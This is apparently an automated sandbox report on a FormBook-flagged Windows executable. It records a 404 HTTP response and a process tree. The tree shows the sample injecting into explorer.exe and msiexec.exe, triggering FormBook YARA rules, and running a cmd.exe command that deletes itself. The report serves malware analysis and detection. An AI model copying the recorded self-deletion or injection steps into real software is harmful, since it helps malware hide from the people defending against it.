6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: RCS76393.exe PID: 6500 Parent PID: 5936

                                                                    General

                                                                    Start time:12:45:47
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Analysis Process: RCS76393.exe PID: 6544 Parent PID: 6500

                                                                    General

                                                                    Start time:12:45:48
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    Analysis Process: explorer.exe PID: 3440 Parent PID: 6544

                                                                    General

                                                                    Start time:12:45:51
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:
                                                                    Imagebase:0x7ff6f22f0000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: msiexec.exe PID: 6760 Parent PID: 3440

                                                                    General

                                                                    Start time:12:46:03
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                    Imagebase:0x1a0000
                                                                    File size:59904 bytes
                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    Analysis Process: cmd.exe PID: 6848 Parent PID: 6760

                                                                    General

                                                                    Start time:12:46:08
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x2a0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Analysis Process: conhost.exe PID: 6864 Parent PID: 6848

                                                                    General

                                                                    Start time:12:46:12
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >